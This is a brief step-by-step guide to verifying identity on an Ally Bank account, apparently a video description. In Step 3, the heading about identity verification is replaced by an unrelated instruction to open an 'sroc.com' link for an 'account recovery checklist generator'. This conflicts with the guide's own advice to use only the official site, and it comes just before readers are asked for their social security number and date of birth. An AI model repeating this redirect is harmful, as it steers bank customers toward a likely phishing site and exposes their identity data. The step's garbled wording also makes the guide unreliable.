Verifying your identity on Ally Bank is an important step to ensure the security of your account. Follow these simple steps to complete the verification process. Step 1. Visit the Ally Bank website. Go to the official Ally Bank website using a secure internet connection. Make sure you're on the correct site to avoid phishing attempts. Step 2. Log into your account. Enter your username and password to log into your Ally Bank account. If you do not have an account, you may need to create one first. Step 3. Navigate to identity verification. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Provide required information. Follow the prompts to enter the necessary information for verification. This may include personal details such as your social security number, date of birth, and address. Step 5. Submit and confirm. After entering your information, review it for accuracy and submit your verification request. You may receive a confirmation message or email once your identity has been successfully verified. Completing these steps will help ensure that your identity is verified with Ally Bank, allowing you to access your account securely.